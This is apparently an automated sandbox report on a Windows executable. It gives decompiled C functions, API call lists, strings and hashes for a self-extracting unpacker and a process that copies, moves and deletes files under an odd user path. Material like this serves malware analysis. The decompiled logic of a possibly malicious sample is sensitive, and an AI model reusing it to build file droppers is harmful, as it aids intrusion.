                									_v16 = _t195 + _v12;
                									__eflags = _t198 - _t150;
                								} while (_t198 != _t150);
                								goto L23;
                							}
                						} else {
                							_t199 = _t198 | 0xffffffff;
                							L24:
                							E00CC7A50(0);
                							goto L25;
                						}
                					} else {
                						while(1) {
                							_v8 = 0x3f2a;
                							_v6 = _t159;
                							_t146 = E00CCDD80( *_t207,  &_v8);
                							__eflags = _t146;
                							if(_t146 != 0) {
                								_push( &_v36);
                								_push(_t146);
                								_push( *_t207);
                								L38();
                								_t223 = _t223 + 0xc;
                							} else {
                								_t146 =  &_v36;
                								_push(_t146);
                								_push(0);
                								_push(0);
                								_push( *_t207);
                								L28();
                								_t223 = _t223 + 0x10;
                							}
                							_t199 = _t146;
                							__eflags = _t199;
                							if(_t199 != 0) {
                								break;
                							}
                							_t207 = _t207 + 4;
                							_t159 = 0;
                							__eflags =  *_t207;
                							if( *_t207 != 0) {
                								continue;
                							} else {
                								_t150 = _v336.cAlternateFileName;
                								_t198 = _v36;
                								goto L9;
                							}
                							goto L68;
                						}
                						L25:
                						E00CCA1ED( &_v36);
                						_t91 = _t199;
                						goto L26;
                					}
                				} else {
                					_t147 = E00CC7ECC();
                					_t218 = 0x16;
                					 *_t147 = _t218;
                					E00CC7DAB();
                					_t91 = _t218;
                					L26:
                					return _t91;
                				}
                				L68:
                			}

                APIs
                • _free.LIBCMT ref: 00CC9FAF
                  • Part of subcall function 00CC7DBB: IsProcessorFeaturePresent.KERNEL32(00000017,00CC7DAA,0000002C,00CDA968,00CCAF68,00000000,00000000,00CC8599,?,?,00CC7DB7,00000000,00000000,00000000,00000000,00000000), ref: 00CC7DBD
                  • Part of subcall function 00CC7DBB: GetCurrentProcess.KERNEL32(C0000417,00CDA968,0000002C,00CC7AE8,00000016,00CC8599), ref: 00CC7DDF
                  • Part of subcall function 00CC7DBB: TerminateProcess.KERNEL32(00000000), ref: 00CC7DE6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                • String ID: *?$.
                • API String ID: 2667617558-3972193922
                • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                • Instruction ID: 3c5c86001f909313f345ad22d013457a92b577063b9663b4c4f5a957a337db2f
                • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                • Instruction Fuzzy Hash: 5451B076E0020AAFDF14CFA8C885FADBBB5EF98314F24816DE855E7341E6319E019B50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00CA7570(void* __ecx, void* __edx) {
                				void* __esi;
                				char _t54;
                				signed int _t57;
                				void* _t61;
                				signed int _t62;
                				signed int _t68;
                				signed int _t85;
                				void* _t90;
                				void* _t99;
                				void* _t101;
                				intOrPtr* _t106;
                				void* _t108;
                
                				_t99 = __edx;
                				E00CBD870(E00CD1298, _t108);
                				E00CBD940();
                				_t106 =  *((intOrPtr*)(_t108 + 0xc));
                				if( *_t106 == 0) {
                					L3:
                					_t101 = 0x802;
                					E00CAFAB1(_t108 - 0x1010, _t106, 0x802);
                					L4:
                					_t81 =  *((intOrPtr*)(_t108 + 8));
                					E00CA7773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
                					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
                					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
                						__eflags =  *((char*)(_t108 + 0x10));
                						if(__eflags == 0) {
                							E00CAFA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
                							E00CA6EF9(_t108 - 0x307c);
                							_push(0);
                							_t54 = E00CAA1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
                							_t85 =  *(_t108 - 0x2074);
                							 *((char*)(_t108 + 0x13)) = _t54;
                							__eflags = _t85 & 0x00000001;
                							if((_t85 & 0x00000001) != 0) {
                								__eflags = _t85 & 0xfffffffe;
                								E00CAA12F(_t106, _t85 & 0xfffffffe);
                							}
                							E00CA943C(_t108 - 0x2034);
                							 *((intOrPtr*)(_t108 - 4)) = 1;
                							_t57 = E00CA9BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
                							__eflags = _t57;
                							if(_t57 != 0) {
                								_push(0);
                								_push(_t108 - 0x2034);
                								_push(0);
                								_t68 = E00CA399D(_t81, _t99);
                								__eflags = _t68;
                								if(_t68 != 0) {
                									E00CA94DA(_t108 - 0x2034);
                								}
                							}
                							E00CA943C(_t108 - 0x50a0);
                							__eflags =  *((char*)(_t108 + 0x13));
                							 *((char*)(_t108 - 4)) = 2;
                							if( *((char*)(_t108 + 0x13)) != 0) {
                								_t62 = E00CA9768(_t108 - 0x50a0, _t106, _t106, 5);
                								__eflags = _t62;
                								if(_t62 != 0) {
                									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
                								}
                							}
                							E00CAA12F(_t106,  *(_t108 - 0x2074));
                							E00CA946E(_t108 - 0x50a0);
                							_t90 = _t108 - 0x2034;
                						} else {
                							E00CA943C(_t108 - 0x60c4);
                							_push(1);
                							_push(_t108 - 0x60c4);
                							_push(0);
                							 *((intOrPtr*)(_t108 - 4)) = 0;
                							E00CA399D(_t81, _t99);
                							_t90 = _t108 - 0x60c4;
                						}
                						_t61 = E00CA946E(_t90);
                					} else {
                						E00CA6BF5(_t113, 0x53, _t81 + 0x1e, _t106);
                						_t61 = E00CA6E03(0xce00e0, 3);
                					}
                					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
                					return _t61;
                				}
                				_t112 =  *((intOrPtr*)(_t106 + 2));
                				if( *((intOrPtr*)(_t106 + 2)) != 0) {
                					goto L3;
                				} else {
                					_t101 = 0x802;
                					E00CAFAB1(_t108 - 0x1010, 0xcd2490, 0x802);
                					E00CAFA89(_t112, _t108 - 0x1010, _t106, 0x802);
                					goto L4;
                				}
                			}
















                APIs
                • __EH_prolog.LIBCMT ref: 00CA7575
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA7711
                  • Part of subcall function 00CAA12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CA9F65,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CAA143
                  • Part of subcall function 00CAA12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CA9F65,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CAA174
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: File$Attributes$H_prologTime
                • String ID: :
                • API String ID: 1861295151-336475711
                • Opcode ID: 467f2e99ed642c18e3598d48fef478fd1394f43af7506a4284263223195b8581
                • Instruction ID: 0de854daaf3fce5c6446330a2abc375a04f06864f50cdf375585443a9a3b3661
                • Opcode Fuzzy Hash: 467f2e99ed642c18e3598d48fef478fd1394f43af7506a4284263223195b8581
                • Instruction Fuzzy Hash: 5D41B471805219AADB25EB60CC56EEF777CEF46308F0041E9B605A3092DB705F89EFA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E00CAB32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
                				short _v4096;
                				short _v4100;
                				signed short* _t30;
                				long _t32;
                				short _t33;
                				void* _t39;
                				signed short* _t52;
                				void* _t53;
                				signed short* _t62;
                				void* _t66;
                				intOrPtr _t69;
                				signed short* _t71;
                				intOrPtr _t73;
                
                				E00CBD940();
                				_t71 = _a4;
                				if( *_t71 != 0) {
                					E00CAB4C6(_t71);
                					_t66 = E00CC2B33(_t71);
                					_t30 = E00CAB4F2(_t71);
                					__eflags = _t30;
                					if(_t30 == 0) {
                						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
                						__eflags = _t32;
                						if(_t32 == 0) {
                							L22:
                							_t33 = 0;
                							__eflags = 0;
                							L23:
                							goto L24;
                						}
                						__eflags = _t32 - 0x7ff;
                						if(_t32 > 0x7ff) {
                							goto L22;
                						}
                						__eflags = E00CAB5CD( *_t71 & 0x0000ffff);
                						if(__eflags == 0) {
                							E00CAAEA5(__eflags,  &_v4100, 0x800);
                							_t39 = E00CC2B33( &_v4100);
                							_t69 = _a12;
                							__eflags = _t69 - _t39 + _t66 + 4;
                							if(_t69 <= _t39 + _t66 + 4) {
                								goto L22;
                							}
                							E00CAFAB1(_a8, L"\\\\?\\", _t69);
                							E00CAFA89(__eflags, _a8,  &_v4100, _t69);
                							__eflags =  *_t71 - 0x2e;
                							if(__eflags == 0) {
                								__eflags = E00CAB5CD(_t71[1] & 0x0000ffff);
                								if(__eflags != 0) {
                									_t71 =  &(_t71[2]);
                									__eflags = _t71;
                								}
                							}
                							L19:
                							_push(_t69);
                							L20:
                							_push(_t71);
                							L21:
                							_push(_a8);
                							E00CAFA89(__eflags);
                							_t33 = 1;
                							goto L23;
                						}
                						_t13 = _t66 + 6; // 0x6
                						_t69 = _a12;
                						__eflags = _t69 - _t13;
                						if(_t69 <= _t13) {
                							goto L22;
                						}
                						E00CAFAB1(_a8, L"\\\\?\\", _t69);
                						_v4096 = 0;
                						E00CAFA89(__eflags, _a8,  &_v4100, _t69);
                						goto L19;
                					}
                					_t52 = E00CAB4C6(_t71);
                					__eflags = _t52;
                					if(_t52 == 0) {
                						_t53 = 0x5c;
                						__eflags =  *_t71 - _t53;
                						if( *_t71 != _t53) {
                							goto L22;
                						}
                						_t62 =  &(_t71[1]);
                						__eflags =  *_t62 - _t53;
                						if( *_t62 != _t53) {
                							goto L22;
                						}
                						_t73 = _a12;
                						_t9 = _t66 + 6; // 0x6
                						__eflags = _t73 - _t9;
                						if(_t73 <= _t9) {
                							goto L22;
                						}
                						E00CAFAB1(_a8, L"\\\\?\\", _t73);
                						E00CAFA89(__eflags, _a8, L"UNC", _t73);
                						_push(_t73);
                						_push(_t62);
                						goto L21;
                					}
                					_t2 = _t66 + 4; // 0x4
                					__eflags = _a12 - _t2;
                					if(_a12 <= _t2) {
                						goto L22;
                					}
                					E00CAFAB1(_a8, L"\\\\?\\", _a12);
                					_push(_a12);
                					goto L20;
                				} else {
                					_t33 = 0;
                					L24:
                					return _t33;
                				}
                			}

















                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: UNC$\\?\
                • API String ID: 0-253988292
                • Opcode ID: 9e7be3b5b11b9f8f894c0bbf2f417c25637461f779a7ea870883397d0fa63359
                • Instruction ID: 624cef2ecff8747809ea8b13227eeb3229829e1a55354d09d1e7a81015232153
                • Opcode Fuzzy Hash: 9e7be3b5b11b9f8f894c0bbf2f417c25637461f779a7ea870883397d0fa63359
                • Instruction Fuzzy Hash: 3841CB3140021B7ACF20AF61DC41EEB7769AF0B759F00806AF95493153D7749E51EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E00CB8A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                				void* __esi;
                				intOrPtr _t18;
                				char _t19;
                				intOrPtr* _t23;
                				signed int _t25;
                				void* _t26;
                				intOrPtr* _t28;
                				void* _t38;
                				void* _t43;
                				intOrPtr _t44;
                				signed int* _t48;
                
                				_t44 = _a4;
                				_t43 = __ecx;
                				 *((intOrPtr*)(__ecx + 4)) = _t44;
                				_t18 = E00CBD82C(__edx, _t44, __eflags, 0x30);
                				_a4 = _t18;
                				if(_t18 == 0) {
                					_t19 = 0;
                					__eflags = 0;
                				} else {
                					_t19 = E00CB83B5(_t18);
                				}
                				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
                				if(_t19 == 0) {
                					return _t19;
                				} else {
                					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
                					E00CB9184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
                					E00CB931D( *((intOrPtr*)(_t43 + 0xc)), 1);
                					E00CB92D3( *((intOrPtr*)(_t43 + 0xc)), 1);
                					_t23 = E00CB9238( *((intOrPtr*)(_t43 + 0xc)));
                					_t28 = _t23;
                					if(_t28 == 0) {
                						L7:
                						__eflags =  *(_t43 + 0x10);
                						if( *(_t43 + 0x10) != 0) {
                							E00CB8581(_t43);
                							_t25 =  *(_t43 + 0x10);
                							_push(0);
                							_push(0);
                							_push(0);
                							 *((char*)(_t43 + 0x25)) = 0;
                							_t38 =  *_t25;
                							_push(0);
                							__eflags =  *(_t43 + 0x20);
                							if( *(_t43 + 0x20) == 0) {
                								_push(L"about:blank");
                							} else {
                								_push( *(_t43 + 0x20));
                							}
                							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
                						}
                						L12:
                						return _t23;
                					}
                					_t10 = _t43 + 0x10; // 0x10
                					_t48 = _t10;
                					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0xcd412c, _t48);
                					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
                					if(_t26 >= 0) {
                						goto L7;
                					}
                					 *_t48 =  *_t48 & 0x00000000;
                					goto L12;
                				}
                			}















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: Shell.Explorer$about:blank
                • API String ID: 0-874089819
                • Opcode ID: f8d231274c26b9299e3fbc2e9379a53b99851b837f506d5e05b169a49901ba09
                • Instruction ID: 1e43e1f64706515be0839aeb5cdc88308ef8ce315b80679284ce1f37ce98d8d8
                • Opcode Fuzzy Hash: f8d231274c26b9299e3fbc2e9379a53b99851b837f506d5e05b169a49901ba09
                • Instruction Fuzzy Hash: 91216F71640616BFD7049FB4C891EAAB3ACFF45711F04812AF2158B681DF70E915EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00CAE862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
                				void* __esi;
                				void* __ebp;
                				intOrPtr* _t11;
                				intOrPtr* _t12;
                				signed char _t13;
                				void* _t17;
                				signed char _t18;
                				void* _t20;
                				signed int _t22;
                				signed int _t30;
                				void* _t31;
                				void* _t32;
                				intOrPtr _t33;
                				signed int _t36;
                
                				_t32 = __edi;
                				_t17 = __ebx;
                				_t11 =  *0xce7358; // 0x0
                				if(_t11 == 0) {
                					E00CAE7E3(0xce7350);
                					_t11 =  *0xce7358; // 0x0
                				}
                				_t36 = _a8;
                				_t22 = _t36 & 0xfffffff0;
                				_t30 = 0 | _a16 != 0x00000000;
                				if(_a12 == 0) {
                					_t12 =  *0xce735c; // 0x0
                					if(_t12 == 0) {
                						goto L10;
                					} else {
                						_t13 =  *_t12(_a4, _t22, _t30);
                						if(_t13 == 0) {
                							_push(L"CryptUnprotectMemory failed");
                							goto L6;
                						}
                					}
                				} else {
                					if(_t11 == 0) {
                						L10:
                						_push(_t17);
                						_t13 = GetCurrentProcessId();
                						_t31 = 0;
                						_t18 = _t13;
                						if(_t36 != 0) {
                							_push(_t32);
                							_t33 = _a4;
                							_t20 = _t18 + 0x4b;
                							do {
                								_t13 = _t31 + _t20;
                								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
                								_t31 = _t31 + 1;
                							} while (_t31 < _t36);
                						}
                					} else {
                						_t13 =  *_t11(_a4, _t22, _t30);
                						if(_t13 == 0) {
                							_push(L"CryptProtectMemory failed");
                							L6:
                							_push(0xce00e0);
                							_t13 = E00CA6CC9(E00CBE214(E00CA6CCE(_t22)), 0xce00e0, 0xce00e0, 2);
                						}
                					}
                				}
                				return _t13;
                			}


















                APIs
                  • Part of subcall function 00CAE7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAE802
                  • Part of subcall function 00CAE7E3: GetProcAddress.KERNEL32(00CE7350,CryptUnprotectMemory), ref: 00CAE812
                • GetCurrentProcessId.KERNEL32(?,?,?,00CAE85C), ref: 00CAE8E3
                Strings
                • CryptProtectMemory failed, xrefs: 00CAE8A3
                • CryptUnprotectMemory failed, xrefs: 00CAE8DB
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: 7cec41b20cb21a4b55d52116ade1e61610f342730b777803d366f4f994a6e525
                • Instruction ID: 8950e60b9efe695f62500a9333a4fe6afb6cabbfcdb547737dd837dac182b436
                • Opcode Fuzzy Hash: 7cec41b20cb21a4b55d52116ade1e61610f342730b777803d366f4f994a6e525
                • Instruction Fuzzy Hash: 931127307043572BEB119B3DDC41BBF3799DF86B5CB084129F8109A2D2DB65DE41A2D1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00CA12D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
                				struct HWND__* _t20;
                				struct HWND__* _t21;
                
                				if(_a8 == 0x30) {
                					E00CAD6E4(0xce0078, _a4);
                				} else {
                					_t27 = _a8 - 0x110;
                					if(_a8 == 0x110) {
                						E00CAD70B(0xce0078, _t27, _a4, _a20, _a28 & 1);
                						if((_a28 & 0x00000001) != 0) {
                							_t20 =  *0xcddfd4(_a4);
                							if(_t20 != 0) {
                								_t21 = GetDlgItem(_t20, 0x3021);
                								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
                									SetWindowTextW(_t21, 0xcd22e4);
                								}
                							}
                						}
                					}
                				}
                				return 0;
                			}






                APIs
                  • Part of subcall function 00CAD70B: _swprintf.LIBCMT ref: 00CAD731
                  • Part of subcall function 00CAD70B: _strlen.LIBCMT ref: 00CAD752
                  • Part of subcall function 00CAD70B: SetDlgItemTextW.USER32(?,00CDD154,?), ref: 00CAD7B2
                  • Part of subcall function 00CAD70B: GetWindowRect.USER32(?,?), ref: 00CAD7EC
                  • Part of subcall function 00CAD70B: GetClientRect.USER32(?,?), ref: 00CAD7F8
                • GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                • SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: 0
                • API String ID: 2622349952-4108050209
                • Opcode ID: 2023221d83ddf8db8bd20dcb071d0e7e46eeb7c10b76282a51d3a8d566d96a9e
                • Instruction ID: c10187ea43927fa64f0eeb85147c97a7212b27907c3442a655dfe3ea490ae718
                • Opcode Fuzzy Hash: 2023221d83ddf8db8bd20dcb071d0e7e46eeb7c10b76282a51d3a8d566d96a9e
                • Instruction Fuzzy Hash: 74F0C2B054238AABDF251F638C09BED3F59AF1634EF088415FC96918B1C778CA90EB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E00CB04BA(void* __ecx, void* __ebp, void* _a4) {
                				void* __esi;
                				long _t2;
                				void* _t6;
                
                				_t6 = __ecx;
                				_t2 = WaitForSingleObject(_a4, 0xffffffff);
                				if(_t2 == 0xffffffff) {
                					_push(GetLastError());
                					return E00CA6CC9(E00CA6CCE(_t6, 0xce00e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xce00e0, 0xce00e0, 2);
                				}
                				return _t2;
                			}







                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,00CB05D9,?,?,00CB064E,?,?,?,?,?,00CB0638), ref: 00CB04C0
                • GetLastError.KERNEL32(?,?,00CB064E,?,?,?,?,?,00CB0638), ref: 00CB04CC
                  • Part of subcall function 00CA6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6CEC
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CB04D5
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                • Opcode ID: 09e6228ccebe5b8fd6b69ff6225ee109ec2508b487d1c5111d1edbbf654d7b3b
                • Instruction ID: 445fae978b56d1cad7299d828a454ca3787b146fdf6ad06604116507ac656993
                • Opcode Fuzzy Hash: 09e6228ccebe5b8fd6b69ff6225ee109ec2508b487d1c5111d1edbbf654d7b3b
                • Instruction Fuzzy Hash: 0CD05E7150A03267DB0123686D0AFAFBA15DF22338F64871AF639652E6CA200D9196D5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CAD6C1(void* __ecx) {
                				struct HRSRC__* _t3;
                				void* _t5;
                
                				_t5 = __ecx;
                				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
                				if(_t3 != 0) {
                					 *((char*)(_t5 + 0x64)) = 1;
                					return _t3;
                				}
                				return _t3;
                			}






                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,00CACFBE,?), ref: 00CAD6C6
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CACFBE,?), ref: 00CAD6D4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                • Opcode ID: 178d6328baf371cf28e91022808ac7a3c7cad7c170078cfd6d692f091aa1b0ae
                • Instruction ID: 397bcef60e5980607b6e5fa74abbe072eba0e29f4126d00986b8f6f8592b24e9
                • Opcode Fuzzy Hash: 178d6328baf371cf28e91022808ac7a3c7cad7c170078cfd6d692f091aa1b0ae
                • Instruction Fuzzy Hash: 04C0803134231256D73027307C0DF47AF58BF25B12F15045AF246D91D0DDE5D441C750
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                APIs
                • _wcslen.LIBCMT ref: 003F9911
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • _memmove.LIBCMT ref: 003F995C
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 003F99A3
                • _memmove.LIBCMT ref: 003F9FE6
                • _memmove.LIBCMT ref: 003FA914
                • _memmove.LIBCMT ref: 00419769
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                • String ID: DZG
                • API String ID: 2383988440-540974563
                • Opcode ID: e8bc172c246d3ef7ea22a2d1c4d4cc256bf0a323a2447f591e62d703d8e20420
                • Instruction ID: 606d59d22e27baff8969b225c4b21d7081edcb44714574d8a1f9664696161b08
                • Opcode Fuzzy Hash: e8bc172c246d3ef7ea22a2d1c4d4cc256bf0a323a2447f591e62d703d8e20420
                • Instruction Fuzzy Hash: DE139DB4608204DFC725DF24C480B6BB7E5BF89304F14896EE58A8B751D739EC85CB96
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 003FF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\31956653\thjfdg.xcp,003FF1F5,C:\Users\user\31956653\thjfdg.xcp,004990E8,C:\Users\user\31956653\thjfdg.xcp,?,003FF1F5,?,?,00000001), ref: 003FF23C
                  • Part of subcall function 004238ED: __wsplitpath.LIBCMT ref: 00423913
                  • Part of subcall function 004238ED: __wsplitpath.LIBCMT ref: 00423935
                  • Part of subcall function 004238ED: __wcsicoll.LIBCMT ref: 00423959
                  • Part of subcall function 0042397D: GetFileAttributesW.KERNELBASE(?), ref: 00423984
                • _wcscat.LIBCMT ref: 0043BD20
                • _wcscat.LIBCMT ref: 0043BD49
                • __wsplitpath.LIBCMT ref: 0043BD76
                • FindFirstFileW.KERNELBASE(?,?), ref: 0043BD8E
                • _wcscpy.LIBCMT ref: 0043BDFD
                • _wcscat.LIBCMT ref: 0043BE0F
                • _wcscat.LIBCMT ref: 0043BE21
                • lstrcmpiW.KERNEL32(?,?), ref: 0043BE4D
                • DeleteFileW.KERNEL32(?), ref: 0043BE5F
                • MoveFileW.KERNEL32(?,?), ref: 0043BE7F
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0043BE96
                • DeleteFileW.KERNEL32(?), ref: 0043BEA1
                • CopyFileW.KERNELBASE(?,?,00000000), ref: 0043BEB8
                • FindClose.KERNEL32(00000000), ref: 0043BEBF
                • MoveFileW.KERNEL32(?,?), ref: 0043BEDB
                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0043BEF0
                • FindClose.KERNEL32(00000000), ref: 0043BF08
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                • String ID: \*.*
                • API String ID: 2188072990-1173974218
                • Opcode ID: c4cdbdea409be23f1c26f4208fa94dffad9e8f990ca354e161e1abfc6b534ec0
                • Instruction ID: 163240f75b358e77946f66d954b4087e32ff12944d2ce604809ac529e4835159
                • Opcode Fuzzy Hash: c4cdbdea409be23f1c26f4208fa94dffad9e8f990ca354e161e1abfc6b534ec0
                • Instruction Fuzzy Hash: F65152B2408384AAC724DBA4DC45FDF73E8EF89315F444A1EF78982151EB79D248C7A6
                Uniqueness

                Uniqueness Score: -1.00%

